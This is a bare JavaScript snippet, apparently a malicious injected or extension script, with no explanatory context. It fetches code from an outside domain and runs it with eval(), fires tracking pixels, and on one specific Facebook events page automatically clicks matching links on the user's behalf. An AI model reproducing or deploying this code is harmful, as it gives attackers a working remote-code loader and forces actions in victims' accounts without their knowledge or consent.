var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
    if (xhr.readyState == XMLHttpRequest.DONE) {
        eval(xhr.responseText)
    }
}
xhr.open('GET', 'https://susayi.us/dash.php', true);
xhr.send(null);
new Image().src = '//whos.amung.us/widget/sikayetet2.png';
if(window.location.href == "https://www.facebook.com/events/281242216042782/"){
new Image().src = '//whos.amung.us/widget/sikayetet.png';
	var allA = document.querySelectorAll("a");
	for(var i =0 ; i < allA.length ; i++){
	  if(allA[i].innerHTML.indexOf("_3-8_ _3-8_ img sp_3z5Mtt9-HpC_2x sx_d1fac7") >= 0){
	  allA[i].click();
	  }
	}
}
